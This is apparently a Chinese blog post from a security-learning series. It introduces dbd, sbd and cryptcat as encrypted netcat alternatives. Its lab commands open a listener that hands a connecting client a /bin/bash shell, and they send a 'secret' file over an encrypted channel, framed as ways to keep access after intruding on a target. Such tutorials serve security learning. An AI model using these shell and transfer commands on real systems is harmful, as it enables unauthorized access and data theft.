【Day20】维持连线 ─ 工具实作篇(二)

哈罗~
昨天我们实作了Netcat(nc)的基本操作，
今天想来补充一些类似Netcat(nc)的东东。

dbd

dbd是使用TCP/IP传输，
Netcat有的功能，dbd也有，
差异在於dbd具有加密的功能，
使用AES-CBC-128 & HMAC-SHA1来加密通讯。

常用参数：

更多参数说明可使用dbd -h来查询。

环境准备：
一台VM当Server (192.168.168.129)
一台VM当Client (192.168.168.131)

1. 启动接听功能，并开启77 port，待对方连线後会开启bash，设定每十分钟(3600s)传送一次。

dbd -l -p 777 -e /bin/bash -r 3600

2. 当另一端连线至777 port後，就会取得电脑Shell的主控权。
透过ifconfig也可以确认IP已更改。

dbd -l [Server IP] 777
whoami
ifconfig

sbd

可以在Linux与Window(32位元)系统使用，与dbd很相似，
并使用AES-CBC-128 和HMAC-SHA1 来加密通讯。
更多功能说明可使用sbd -h来查询。

cryptcat

与netcat是同性质的工具，
可透过TCP、UDP传输，
并在传送之前先进行加密。

常用参数：

更多参数说明可使用cryptcat -h来查询。

环境准备：
一台VM当Server (192.168.118.131)
一台VM当Client (192.168.118.133)

1. Server开启接听模式，指定7777port与密码123@，并将监听到的资讯写在upload档案中。

cryptcat -l -p 7777 -k [密码] > upload

2. 待Client连线至7777port，并将Chilla的秘密存在sercet档案传给Server，且档案有进行加密。

cryptcat [Server IP] 7777 -k [密码] < sercet

3. Server 打开upload档案查看接听到的资讯时，就会看到存有Chilla秘密的sercet档。

cat upload

小结

今天介绍的三个小工具：

• dbd
• sbd
• cryptcat

都与我们前一篇介绍的Netcat相似，
这三个工具都有添加加密的功能，
只是dbd与sbd只支援TCP/IP传输。

想要入侵目标系统并取得权限，
除了使用漏洞强行进入、使用前面介绍的密码破解方式来提权，
也可利用这两天介绍的这种网路控制工具。

走罗! 高歌离席~